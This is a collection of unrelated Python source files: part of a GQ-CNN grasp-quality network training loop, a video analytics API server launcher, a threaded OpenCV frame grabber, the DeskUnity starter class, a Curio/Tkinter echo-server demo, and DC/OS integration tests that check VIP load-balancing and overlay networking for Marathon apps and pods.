self.logger.debug('File num: %d' %(file_num))
# get batch indices uniformly at random
train_ind = self.train_index_map[file_num]
np.random.shuffle(train_ind)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
tp_tmp = read_pose_data(train_poses_tensor.data, self.gripper_mode)
train_ind = train_ind[np.isfinite(tp_tmp[train_ind,1])]
# filter positives and negatives
if self.training_mode == TrainingMode.CLASSIFICATION and self.pos_weight != 0.0:
labels = 1 * (train_labels_tensor.arr > self.metric_thresh)
np.random.shuffle(train_ind)
filtered_ind = []
for index in train_ind:
if labels[index] == 0 and np.random.rand() < self.neg_accept_prob:
filtered_ind.append(index)
elif labels[index] == 1 and np.random.rand() < self.pos_accept_prob:
filtered_ind.append(index)
train_ind = np.array(filtered_ind)
# sample train indices
upper = min(num_remaining, train_ind.shape[0], self.max_training_examples_per_load)
ind = train_ind[:upper]
num_loaded = ind.shape[0]
if num_loaded == 0:
self.logger.warning('Queueing zero examples!!!!')
continue
# subsample data
train_images_arr = train_images_tensor.arr[ind, ...]
train_poses_arr = train_poses_tensor.arr[ind, ...]
angles = train_poses_arr[:, 3]
train_label_arr = train_labels_tensor.arr[ind]
num_images = train_images_arr.shape[0]
# resize images
rescale_factor = float(self.im_height) / train_images_arr.shape[1]
if rescale_factor != 1.0:
resized_train_images_arr = np.zeros([num_images,
self.im_height,
self.im_width,
self.im_channels]).astype(np.float32)
for i in range(num_images):
for c in range(train_images_arr.shape[3]):
resized_train_images_arr[i,:,:,c] = sm.imresize(train_images_arr[i,:,:,c],
rescale_factor,
interp='bicubic', mode='F')
train_images_arr = resized_train_images_arr
# add noise to images
train_images_arr, train_poses_arr = self._distort(train_images_arr, train_poses_arr)
# slice poses
train_poses_arr = read_pose_data(train_poses_arr,
self.gripper_mode)
# standardize inputs and outputs
if self._norm_inputs:
train_images_arr = (train_images_arr - self.im_mean) / self.im_std
if self.gqcnn.input_depth_mode == InputDepthMode.POSE_STREAM:
train_poses_arr = (train_poses_arr - self.pose_mean) / self.pose_std
train_label_arr = 1 * (train_label_arr > self.metric_thresh)
train_label_arr = train_label_arr.astype(self.numpy_dtype)
if self._angular_bins > 0:
bins = np.zeros_like(train_label_arr)
# form prediction mask to use when calculating loss
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
train_pred_mask_arr = np.zeros((train_label_arr.shape[0], self._angular_bins*2))
for i in range(angles.shape[0]):
bins[i] = angles[i] // self._bin_width
train_pred_mask_arr[i, int((angles[i] // self._bin_width)*2)] = 1
train_pred_mask_arr[i, int((angles[i] // self._bin_width)*2 + 1)] = 1
# compute the number of examples loaded
num_loaded = train_images_arr.shape[0]
end_i = start_i + num_loaded
# enqueue training data batch
train_images[start_i:end_i, ...] = train_images_arr.copy()
train_poses[start_i:end_i,:] = train_poses_arr.copy()
train_labels[start_i:end_i] = train_label_arr.copy()
if self._angular_bins > 0:
train_pred_mask[start_i:end_i] = train_pred_mask_arr.copy()
del train_images_arr
del train_poses_arr
del train_label_arr
# update start index
start_i = end_i
num_queued += num_loaded
# send data to queue
if not self.term_event.is_set():
try:
if self._angular_bins > 0:
self.prefetch_q.put_nowait((train_images, train_poses, train_labels, train_pred_mask))
else:
self.prefetch_q.put_nowait((train_images, train_poses, train_labels))
except queue.Full:
time.sleep(GeneralConstants.QUEUE_SLEEP)
queue_stop = time.time()
self.logger.debug('Queue batch took %.3f sec' %(queue_stop - queue_start))
del train_images
del train_poses
del train_labels
if self._angular_bins > 0:
del train_pred_mask
def _distort(self, image_arr, pose_arr):
""" Adds noise to a batch of images """
# read params
num_images = image_arr.shape[0]
# denoising and synthetic data generation
if self.cfg['multiplicative_denoising']:
mult_samples = ss.gamma.rvs(self.gamma_shape, scale=self.gamma_scale, size=num_images)
mult_samples = mult_samples[:,np.newaxis,np.newaxis,np.newaxis]
image_arr = image_arr * np.tile(mult_samples, [1, self.im_height, self.im_width, self.im_channels])
# add correlated Gaussian noise
if self.cfg['gaussian_process_denoising']:
for i in range(num_images):
if np.random.rand() < self.cfg['gaussian_process_rate']:
train_image = image_arr[i,:,:,0]
gp_noise = ss.norm.rvs(scale=self.gp_sigma, size=self.gp_num_pix).reshape(self.gp_sample_height, self.gp_sample_width)
gp_noise = sm.imresize(gp_noise, self.gp_rescale_factor, interp='bicubic', mode='F')
train_image[train_image > 0] += gp_noise[train_image > 0]
image_arr[i,:,:,0] = train_image
# symmetrize images
if self.cfg['symmetrize']:
for i in range(num_images):
train_image = image_arr[i,:,:,0]
# rotate with 50% probability
if np.random.rand() < 0.5:
theta = 180.0
rot_map = cv2.getRotationMatrix2D(tuple(self.im_center), theta, 1)
train_image = cv2.warpAffine(train_image, rot_map, (self.im_height, self.im_width), flags=cv2.INTER_NEAREST)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
pose_arr[:,3] = -pose_arr[:,3]
elif self.gripper_mode == GripperMode.SUCTION:
pose_arr[:,4] = -pose_arr[:,4]
# reflect left right with 50% probability
if np.random.rand() < 0.5:
train_image = np.fliplr(train_image)
# reflect up down with 50% probability
if np.random.rand() < 0.5:
train_image = np.flipud(train_image)
if self.gripper_mode == GripperMode.LEGACY_SUCTION:
pose_arr[:,3] = -pose_arr[:,3]
elif self.gripper_mode == GripperMode.SUCTION:
pose_arr[:,4] = -pose_arr[:,4]
image_arr[i,:,:,0] = train_image
return image_arr, pose_arr
def _error_rate_in_batches(self, num_files_eval=None, validation_set=True):
""" Compute error and loss over either training or validation set
Returns
-------
:obj:'autolab_core.BinaryClassificationResult`
validation error
"""
all_predictions = []
all_labels = []
# subsample files
file_indices = np.arange(self.num_tensors)
if num_files_eval is None:
num_files_eval = self.max_files_eval
np.random.shuffle(file_indices)
if self.max_files_eval is not None and num_files_eval > 0:
file_indices = file_indices[:num_files_eval]
for i in file_indices:
# load next file
images = self.dataset.tensor(self.im_field_name, i).arr
poses = self.dataset.tensor(self.pose_field_name, i).arr
raw_poses = np.array(poses, copy=True)
labels = self.dataset.tensor(self.label_field_name, i).arr
# if no datapoints from this file are in validation then just continue
if validation_set:
indices = self.val_index_map[i]
else:
indices = self.train_index_map[i]
if len(indices) == 0:
continue
images = images[indices,...]
poses = read_pose_data(poses[indices,:],
self.gripper_mode)
raw_poses = raw_poses[indices, :]
labels = labels[indices]
if self.training_mode == TrainingMode.CLASSIFICATION:
labels = 1 * (labels > self.metric_thresh)
labels = labels.astype(np.uint8)
if self._angular_bins > 0:
# form mask to extract predictions from ground-truth angular bins
angles = raw_poses[:, 3]
neg_ind = np.where(angles < 0)
angles = np.abs(angles) % self._max_angle
angles[neg_ind] *= -1
g_90 = np.where(angles > (self._max_angle / 2))
l_neg_90 = np.where(angles < (-1 * (self._max_angle / 2)))
angles[g_90] -= self._max_angle
angles[l_neg_90] += self._max_angle
angles *= -1 # hack to fix reverse angle convention
angles += (self._max_angle / 2)
pred_mask = np.zeros((labels.shape[0], self._angular_bins*2), dtype=bool)
for j in range(angles.shape[0]):
pred_mask[j, int((angles[j] // self._bin_width)*2)] = True
pred_mask[j, int((angles[j] // self._bin_width)*2 + 1)] = True
# get predictions
predictions = self.gqcnn.predict(images, poses)
if self._angular_bins > 0:
predictions = predictions[pred_mask].reshape((-1, 2))
# update
all_predictions.extend(predictions[:,1].tolist())
all_labels.extend(labels.tolist())
# clean up
del images
del poses
# get learning result
result = None
if self.training_mode == TrainingMode.CLASSIFICATION:
result = BinaryClassificationResult(all_predictions, all_labels)
else:
result = RegressionResult(all_predictions, all_labels)
return result
|
__main__.py
|
#!/usr/bin/env python3
import sys
import os
import connexion
import asyncio
from openapi_server import encoder
sys.path.append(os.path.dirname(__file__) + "/../../")
from common.settings import CONFIG_PATH
from common.settings import MAX_RUNNING_PIPELINES
from modules.PipelineManager import PipelineManager
from modules.ModelManager import ModelManager
from threading import Thread
from common.utils import logging
from optparse import OptionParser
logger = logging.get_logger('main', is_static=True)
def get_options():
parser = OptionParser()
parser.add_option("-p", "--port", action="store", type="int", dest="port", default=8080)
parser.add_option("--framework", action="store", dest="framework",
choices=['gstreamer', 'ffmpeg'], default='gstreamer')
parser.add_option("--pipeline_dir", action="store", dest="pipeline_dir",
type="string", default='pipelines/gstreamer')
parser.add_option("--model_dir", action="store", dest="model_dir",
type="string", default='models')
return parser.parse_args()
def gobject_mainloop():
from gi.repository import Gst, GObject
mainloop = GObject.MainLoop()
try:
mainloop.run()
except KeyboardInterrupt:
pass
def main(options):
PipelineManager.load_config(os.path.join(CONFIG_PATH, options.pipeline_dir), MAX_RUNNING_PIPELINES)
ModelManager.load_config(os.path.join(CONFIG_PATH, options.model_dir))
asyncio.set_event_loop(asyncio.new_event_loop())
app = connexion.App(__name__, specification_dir='./openapi/')
app.app.json_encoder = encoder.JSONEncoder
app.add_api('openapi.yaml', arguments={'title': 'Video Analytics API'})
logger.info("Starting Tornado Server on port: {p}".format(p=options.port))
app.run(server='tornado', port=options.port)
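# NOTE: main() is started below on a daemon thread so that, when the
# gstreamer framework is selected, the GObject main loop can occupy the
# main thread; with ffmpeg the main thread simply joins the server thread.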
if __name__ == '__main__':
try:
options, args = get_options()
except Exception as error:
print(error)
logger.error("Getopt Error!")
exit(1)
thread = Thread(target=main, args=[options])
thread.daemon = True
thread.start()
if (options.framework == "gstreamer"):
gobject_mainloop()
else:
thread.join()
logger.info("Exiting")
|
ThreadedImageGrabber.py
|
import threading
import cv2
import numpy as np
class ThreadedImageGrabber:
stopped: bool = False
__thread: threading.Thread
__frame: np.ndarray
def __init__(self, src):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.__frame) = self.stream.read()
def start(self) -> 'ThreadedImageGrabber':
self.__thread = threading.Thread(target=self.grab, args=())
self.__thread.start()
return self
def grab(self) -> None:
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, frame) = self.stream.read()
self.__frame = frame
def stop(self) -> None:
self.stopped = True
# grab() calls stop() from inside the grabber thread when the stream ends;
# joining the current thread would raise RuntimeError, so guard against it
if threading.current_thread() is not self.__thread:
self.__thread.join()
def read(self) -> np.ndarray:
return self.__frame
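# Example usage (illustrative; assumes a capture device exists at index 0):
# grabber = ThreadedImageGrabber(0).start()
# latest_frame = grabber.read()
# grabber.stop()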
|
deskunity.py
|
""""
DeskUnity 1.0
Starter Class
"""
import logging
import threading
from gui import GUI
from core.interface import Interface
from core.computer import Computer
logging.basicConfig(
level=logging.DEBUG,
format='[%(levelname)s] %(message)s'
)
class DeskUnity:
this_computer = None
app = None
thread = None
def __init__(self):
self.app = GUI(exit_handler=self.exit_handler)
def show_ui(self):
self.app.show()
def start(self):
logging.info("Starting DeskUnity...")
# app = GUI()
def run():
self.app.ui.set_status("Searching for servers...")
servers = Interface.get_desk_unity_servers()
self.this_computer = Computer()
if len(servers) == 0:
self.app.ui.set_status("No server founds.")
logging.info("No server found.")
self.app.ui.set_status("Starting as server.")
self.this_computer.start_server()
self.app.ui.set_status("Server Started.")
return True
else:
lan_server = servers[0]
if len(servers) > 1:
self.app.ui.set_status("Found more than one server, choosing best interface...")
for server in servers:
interface = Interface.get_interface_by_ip(server)
if interface["lan"]:
lan_server = server
self.app.ui.set_status("Connecting to server...")
self.this_computer.connect_to_server(lan_server)
else:
server = servers[0]
self.app.ui.set_status("Connecting to server...")
self.this_computer.connect_to_server(server)
self.app.ui.set_status("Connected to server.")
return False
self.thread = threading.Thread(target=run)
self.thread.start()
def exit_handler(self):
if self.this_computer.is_server():
self.this_computer.stop_server()
else:
self.this_computer.stop_client()
|
guiserv2.py
|
# guiserv2.py
#
# Another example of integrating Curio with the Tkinter
# event loop using UniversalQueue and threads.
import tkinter as tk
import threading
from curio import *
class EchoApp(object):
def __init__(self):
self.gui_ops = UniversalQueue(withfd=True)
self.coro_ops = UniversalQueue()
# Main Tk window
self.root = tk.Tk()
# Number of clients connected label
self.clients_label = tk.Label(text='')
self.clients_label.pack()
self.nclients = 0
self.incr_clients(0)
self.client_tasks = set()
# Number of bytes received label
self.bytes_received = 0
self.bytes_label = tk.Label(text='')
self.bytes_label.pack()
self.update_bytes()
# Disconnect all button
self.disconnect_button = tk.Button(text='Disconnect all',
command=lambda: self.coro_ops.put(self.disconnect_all()))
self.disconnect_button.pack()
# Set up event handler for queued GUI updates
self.root.createfilehandler(self.gui_ops, tk.READABLE, self.process_gui_ops)
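# Because gui_ops was created with withfd=True, it exposes a file
# descriptor that becomes readable whenever an item is put on the queue,
# so Tk can invoke process_gui_ops on its own event loop for each queued
# GUI update coming from the coroutines.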
def incr_clients(self, delta=1):
self.nclients += delta
self.clients_label.configure(text='Number Clients %d' % self.nclients)
def update_bytes(self):
self.bytes_label.configure(text='Bytes received %d' % self.bytes_received)
self.root.after(1000, self.update_bytes)
def process_gui_ops(self, file, mask):
while not self.gui_ops.empty():
func, args = self.gui_ops.get()
func(*args)
async def echo_client(self, sock, address):
await self.gui_ops.put((self.incr_clients, (1,)))
self.client_tasks.add(await current_task())
try:
async with sock:
while True:
data = await sock.recv(100000)
if not data:
break
self.bytes_received += len(data)
await sock.sendall(data)
finally:
self.client_tasks.remove(await current_task())
await self.gui_ops.put((self.incr_clients, (-1,)))
async def disconnect_all(self):
for task in list(self.client_tasks):
await task.cancel()
async def main(self):
serv = await spawn(tcp_server, '', 25000, self.echo_client)
while True:
coro = await self.coro_ops.get()
await coro
def run_forever(self):
threading.Thread(target=run, args=(self.main,)).start()
self.root.mainloop()
if __name__ == '__main__':
app = EchoApp()
app.run_forever()
|
test_networking.py
|
import contextlib
import enum
import itertools
import json
import logging
import subprocess
import threading
import time
import uuid
from collections import deque
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.helpers import assert_response_ok
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
log = logging.getLogger(__name__)
GLOBAL_PORT_POOL = iter(range(10000, 32000))
GLOBAL_OCTET_POOL = itertools.cycle(range(254, 10, -1))
class Container(enum.Enum):
POD = 'POD'
class MarathonApp:
def __init__(self, container, network, host,
vip=None, network_name=None,
app_name_fmt=None, host_port=None):
if host_port is None:
host_port = unused_port()
args = {
'app_name_fmt': app_name_fmt,
'network': network,
'host_port': host_port,
'host_constraint': host,
'vip': vip,
'container_type': container,
'healthcheck_protocol': marathon.Healthcheck.MESOS_HTTP
}
if network == marathon.Network.USER:
args['container_port'] = unused_port()
if network_name is not None:
args['network_name'] = network_name
if vip is not None:
del args['host_port']
self.app, self.uuid = test_helpers.marathon_test_app(**args)
# allow this app to run on public slaves
self.app['acceptedResourceRoles'] = ['*', 'slave_public']
self.id = self.app['id']
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/apps', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/apps/{}'.format(self.id))
assert_response_ok(r)
self._info = r.json()
assert self._info['app']['tasksHealthy'] == self.app['instances']
def info(self, dcos_api_session):
try:
if self._info['app']['tasksHealthy'] != self.app['instances']:
raise Exception("Number of Healthy Tasks not equal to number of instances.")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
task = info['app']['tasks'][0]
if 'networks' in self.app and \
self.app['networks'][0]['mode'] == 'container' and \
self.app['networks'][0]['name'] == 'dcos':
host = task['ipAddresses'][0]['ipAddress']
port = self.app['container']['portMappings'][0]['containerPort']
else:
host = task['host']
port = task['ports'][0]
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/apps/{}'.format(self.id))
class MarathonPod:
def __init__(self, network, host, vip=None, pod_name_fmt='/integration-test-{}'):
self._network = network
container_port = 0
if network is not marathon.Network.HOST:
container_port = unused_port()
# ENDPOINT_TEST will be computed from the `endpoints` definition. See [1], [2]
# [1] https://dcos.io/docs/1.10/deploying-services/pods/technical-overview/#environment-variables
# [2] https://github.com/mesosphere/marathon/blob/v1.5.0/
# src/main/scala/mesosphere/mesos/TaskGroupBuilder.scala#L420-L443
port = '$ENDPOINT_TEST' if network == marathon.Network.HOST else container_port
self.uuid = uuid.uuid4().hex
self.id = pod_name_fmt.format(self.uuid)
self.app = {
'id': self.id,
'scheduling': {'placement': {'acceptedResourceRoles': ['*', 'slave_public']}},
'containers': [{
'name': 'app-{}'.format(self.uuid),
'resources': {'cpus': 0.01, 'mem': 32},
'image': {'kind': 'DOCKER', 'id': 'debian:stretch-slim'},
'exec': {'command': {
'shell': '/opt/mesosphere/bin/dcos-shell python '
'/opt/mesosphere/active/dcos-integration-test/util/python_test_server.py '
'{}'.format(port)
}},
'volumeMounts': [{'name': 'opt', 'mountPath': '/opt/mesosphere'}],
'endpoints': [{'name': 'test', 'protocol': ['tcp'], 'hostPort': unused_port()}],
'environment': {'DCOS_TEST_UUID': self.uuid, 'HOME': '/'}
}],
'networks': [{'mode': 'host'}],
'volumes': [{'name': 'opt', 'host': '/opt/mesosphere'}]
}
if host is not None:
self.app['scheduling']['placement']['constraints'] = \
[{'fieldName': 'hostname', 'operator': 'CLUSTER', 'value': host}]
if vip is not None:
self.app['containers'][0]['endpoints'][0]['labels'] = \
{'VIP_0': vip}
if network == marathon.Network.USER:
del self.app['containers'][0]['endpoints'][0]['hostPort']
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'name': 'dcos', 'mode': 'container'}]
elif network == marathon.Network.BRIDGE:
self.app['containers'][0]['endpoints'][0]['containerPort'] = container_port
self.app['networks'] = [{'mode': 'container/bridge'}]
def __str__(self):
return str(self.app)
def deploy(self, dcos_api_session):
return dcos_api_session.marathon.post('/v2/pods', json=self.app).raise_for_status()
@retrying.retry(
wait_fixed=5000,
stop_max_delay=20 * 60 * 1000,
retry_on_result=lambda res: res is False)
def wait(self, dcos_api_session):
r = dcos_api_session.marathon.get('/v2/pods/{}::status'.format(self.id))
assert_response_ok(r)
self._info = r.json()
error_msg = 'Status was {}: {}'.format(self._info['status'], self._info.get('message', 'no message'))
assert self._info['status'] == 'STABLE', error_msg
def info(self, dcos_api_session):
try:
if self._info['status'] != 'STABLE':
raise Exception("The status information is not Stable!")
except Exception:
self.wait(dcos_api_session)
return self._info
def hostport(self, dcos_api_session):
info = self.info(dcos_api_session)
if self._network == marathon.Network.USER:
host = info['instances'][0]['networks'][0]['addresses'][0]
port = self.app['containers'][0]['endpoints'][0]['containerPort']
else:
host = info['instances'][0]['agentHostname']
port = info['instances'][0]['containers'][0]['endpoints'][0]['allocatedHostPort']
return host, port
def purge(self, dcos_api_session):
return dcos_api_session.marathon.delete('/v2/pods/{}'.format(self.id))
def unused_port():
global GLOBAL_PORT_POOL
return next(GLOBAL_PORT_POOL)
def unused_octet():
global GLOBAL_OCTET_POOL
return next(GLOBAL_OCTET_POOL)
def lb_enabled():
expanded_config = test_helpers.get_expanded_config()
return expanded_config['enable_lb'] == 'true'
@retrying.retry(wait_fixed=2000,
stop_max_delay=5 * 60 * 1000,
retry_on_result=lambda ret: ret is None)
def ensure_routable(cmd, host, port, json_output=True):
proxy_uri = 'http://{}:{}/run_cmd'.format(host, port)
log.info('Sending {} data: {}'.format(proxy_uri, cmd))
response = requests.post(proxy_uri, data=cmd, timeout=5).json()
log.info('Requests Response: {}'.format(repr(response)))
if response['status'] != 0:
return None
return json.loads(response['output']) if json_output else response['output']
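# ensure_routable posts the shell command to the helper test server's /run_cmd
# endpoint inside the target task, so the command runs from that task's
# network namespace; the retry decorator keeps polling (for up to five
# minutes) while the command reports a nonzero status.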
def generate_vip_app_permutations():
""" Generate all possible network interface permutations for applying vips
"""
containers = list(marathon.Container) + [Container.POD]
return [(container, vip_net, proxy_net)
for container in containers
for vip_net in list(marathon.Network)
for proxy_net in list(marathon.Network)]
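# For reference: assuming marathon.Container has three members (DOCKER,
# MESOS, NONE) and marathon.Network has three (HOST, BRIDGE, USER), this
# produces (3 + 1) * 3 * 3 = 36 (container, vip_net, proxy_net) tuples.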
def workload_test(dcos_api_session, container, app_net, proxy_net, ipv6, same_host):
(vip, hosts, cmd, origin_app, proxy_app, _pm_app) = \
vip_workload_test(dcos_api_session, container,
app_net, proxy_net, ipv6, True, same_host, False)
return (hosts, origin_app, proxy_app)
@pytest.mark.first
def test_docker_image_availability():
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
@pytest.mark.slow
@pytest.mark.parametrize('same_host', [True, False])
def test_ipv6(dcos_api_session, same_host):
''' Testing autoip, containerip and *.mesos FQDN on ipv6 overlay network '''
(hosts, origin_app, proxy_app) = \
workload_test(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, True, same_host)
log.info('Starting apps :: Hosts: {}'.format(hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
origin_app.wait(dcos_api_session)
proxy_app.wait(dcos_api_session)
log.info('Apps are ready')
origin_app_info = origin_app.info(dcos_api_session)
origin_port = origin_app_info['app']['container']['portMappings'][0]['containerPort']
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
dns_name = '-'.join(reversed(origin_app.id.split('/')[1:]))
try:
zones = ["marathon.autoip.dcos.thisdcos.directory",
"marathon.containerip.dcos.thisdcos.directory",
"marathon.mesos"]
for zone in zones:
cmd = '{} --ipv6 http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'{}.{}:{}'.format(dns_name, zone, origin_port))
log.info("Remote command: {}".format(cmd))
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
@pytest.mark.slow
def test_vip_ipv6(dcos_api_session):
return test_vip(dcos_api_session, marathon.Container.DOCKER,
marathon.Network.USER, marathon.Network.USER, ipv6=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container',
list(marathon.Container))
def test_vip_port_mapping(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network=marathon.Network.HOST,
proxy_net: marathon.Network=marathon.Network.HOST):
return test_vip(dcos_api_session, container, vip_net, proxy_net, with_port_mapping_app=True)
@pytest.mark.slow
@pytest.mark.parametrize(
'container,vip_net,proxy_net',
generate_vip_app_permutations())
def test_vip(dcos_api_session,
container: marathon.Container,
vip_net: marathon.Network,
proxy_net: marathon.Network,
ipv6: bool=False,
with_port_mapping_app=False):
'''Test VIPs between the following source and destination configurations:
* containers: DOCKER, UCR and NONE
* networks: USER, BRIDGE, HOST
* agents: source and destination on the same agent or on different agents
* vips: named and unnamed vip
Origin app will be deployed to the cluster with a VIP. Proxy app will be
deployed either to the same host or elsewhere. Finally, a command is
submitted from the test runner (which should be a master) to the proxy
container that curls the origin container's VIP, and the test asserts
that the expected origin app UUID was returned.
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
errors = []
tests = setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Testing :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info("Remote command: {}".format(cmd))
proxy_host, proxy_port = proxy_app.hostport(dcos_api_session)
try:
if ipv6 and len(hosts) < 2:
# NOTE: If proxy and origin apps run on the same host, IPv6 VIP works from
# proxy task's network namespace only when bridge-nf-call-ip6tables is enabled, i.e
# sysctl -w net.bridge.bridge-nf-call-ip6tables=1
# JIRA: https://jira.mesosphere.com/browse/DCOS_OSS-5122
continue
assert ensure_routable(cmd, proxy_host, proxy_port)['test_uuid'] == origin_app.uuid
except Exception as e:
log.error('Exception: {}'.format(e))
errors.append(e)
finally:
log.info('Purging application: {}'.format(origin_app.id))
origin_app.purge(dcos_api_session)
log.info('Purging application: {}'.format(proxy_app.id))
proxy_app.purge(dcos_api_session)
if pm_app is not None:
log.info('Purging application: {}'.format(pm_app.id))
pm_app.purge(dcos_api_session)
assert not errors
def setup_vip_workload_tests(dcos_api_session, container, vip_net, proxy_net, ipv6, with_port_mapping_app=False):
same_hosts = [True, False] if len(dcos_api_session.all_slaves) > 1 else [True]
tests = [vip_workload_test(dcos_api_session, container, vip_net, proxy_net,
ipv6, named_vip, same_host, with_port_mapping_app)
for named_vip in [True, False]
for same_host in same_hosts]
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
# We do not need the service endpoints because we have deterministically assigned them
log.info('Starting apps :: VIP: {}, Hosts: {}'.format(vip, hosts))
log.info("Origin app: {}".format(origin_app))
origin_app.deploy(dcos_api_session)
log.info("Proxy app: {}".format(proxy_app))
proxy_app.deploy(dcos_api_session)
if pm_app is not None:
log.info("Port Mapping app: {}".format(pm_app))
pm_app.deploy(dcos_api_session)
for vip, hosts, cmd, origin_app, proxy_app, pm_app in tests:
log.info("Deploying apps :: VIP: {}, Hosts: {}".format(vip, hosts))
log.info('Deploying origin app: {}'.format(origin_app.id))
origin_app.wait(dcos_api_session)
log.info('Deploying proxy app: {}'.format(proxy_app.id))
proxy_app.wait(dcos_api_session)
if pm_app is not None:
log.info("Deploying port mapping app: {}".format(pm_app))
pm_app.wait(dcos_api_session)
log.info('Apps are ready')
return tests
def vip_workload_test(dcos_api_session, container, vip_net, proxy_net, ipv6,
named_vip, same_host, with_port_mapping_app):
slaves = dcos_api_session.slaves + dcos_api_session.public_slaves
vip_port = unused_port()
origin_host = slaves[0]
proxy_host = slaves[0] if same_host else slaves[1]
if named_vip:
label = str(uuid.uuid4())
vip = '/{}:{}'.format(label, vip_port)
vipaddr = '{}.marathon.l4lb.thisdcos.directory:{}'.format(label, vip_port)
elif ipv6:
vip_ip = 'fd01:c::{}'.format(unused_octet())
vip = '{}:{}'.format(vip_ip, vip_port)
vipaddr = '[{}]:{}'.format(vip_ip, vip_port)
else:
vip = '198.51.100.{}:{}'.format(unused_octet(), vip_port)
vipaddr = vip
cmd = '{} {} http://{}/test_uuid'.format(
'/opt/mesosphere/bin/curl -s -f -m 5',
'--ipv6' if ipv6 else '--ipv4',
vipaddr)
path_id = '/integration-tests/{}-{}-{}'.format(
enum2str(container),
net2str(vip_net, ipv6),
net2str(proxy_net, ipv6))
test_case_id = '{}-{}'.format(
'named' if named_vip else 'vip',
'local' if same_host else 'remote')
# NOTE: DNS label can't be longer than 63 bytes
origin_fmt = '{}/app-{}'.format(path_id, test_case_id)
origin_fmt = origin_fmt + '-{{:.{}}}'.format(63 - len(origin_fmt))
proxy_fmt = '{}/proxy-{}'.format(path_id, test_case_id)
proxy_fmt = proxy_fmt + '-{{:.{}}}'.format(63 - len(proxy_fmt))
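# Illustrative example (length assumed): if proxy_fmt were 40 characters at
# this point, the appended spec would be '-{:.23}', so the uuid that is later
# substituted into the format string is truncated to at most 23 characters
# and the resulting name stays within the 63-byte DNS label limit.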
network_name = 'dcos6' if ipv6 else 'dcos' # it is used for user network mode only
if container == Container.POD:
origin_app = MarathonPod(vip_net, origin_host, vip, pod_name_fmt=origin_fmt)
proxy_app = MarathonPod(proxy_net, proxy_host, pod_name_fmt=proxy_fmt)
else:
origin_app = MarathonApp(container, vip_net, origin_host, vip,
network_name=network_name, app_name_fmt=origin_fmt)
proxy_app = MarathonApp(container, proxy_net, proxy_host,
network_name=network_name, app_name_fmt=proxy_fmt)
# Port mapping application runs on `proxy_host` and has its `host_port` equal to `vip_port`.
pm_fmt = '{}/pm-{}'.format(path_id, test_case_id)
pm_fmt = pm_fmt + '-{{:.{}}}'.format(63 - len(pm_fmt))
if with_port_mapping_app:
pm_container = Container.MESOS if container == Container.POD else container
pm_app = MarathonApp(pm_container, marathon.Network.BRIDGE, proxy_host, host_port=vip_port, app_name_fmt=pm_fmt)
else:
pm_app = None
hosts = list(set([origin_host, proxy_host]))
return (vip, hosts, cmd, origin_app, proxy_app, pm_app)
@pytest.mark.xfailflake(
jira='DCOS-53552',
reason='flaky because of outdated docker version in the universal installer',
since='2019-07-11'
)
@retrying.retry(wait_fixed=2000,
stop_max_delay=120 * 1000,
retry_on_exception=lambda x: True)
def test_if_overlay_ok(dcos_api_session):
def _check_overlay(hostname, port):
overlays = dcos_api_session.get('/overlay-agent/overlay', host=hostname, port=port).json()['overlays']
assert len(overlays) > 0
for overlay in overlays:
assert overlay['state']['status'] == 'STATUS_OK'
for master in dcos_api_session.masters:
_check_overlay(master, 5050)
for slave in dcos_api_session.all_slaves:
_check_overlay(slave, 5051)
def test_if_dcos_l4lb_disabled(dcos_api_session):
'''Test to make sure dcos_l4lb is disabled'''
if lb_enabled():
pytest.skip('Load Balancer enabled')
data = subprocess.check_output(['/usr/bin/env', 'ip', 'rule'])
# dcos-net creates this ip rule: `9999: from 9.0.0.0/8 lookup 42`
# We check it doesn't exist
assert str(data).find('9999') == -1
def test_ip_per_container(dcos_api_session):
'''Test if we are able to connect to a task with ip-per-container mode
'''
# Launch the test_server in ip-per-container mode (user network)
if len(dcos_api_session.slaves) < 2:
pytest.skip("IP Per Container tests require 2 private agents to work")
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER,
host_port=9080)
app_definition['instances'] = 2
app_definition['constraints'] = [['hostname', 'UNIQUE']]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=True):
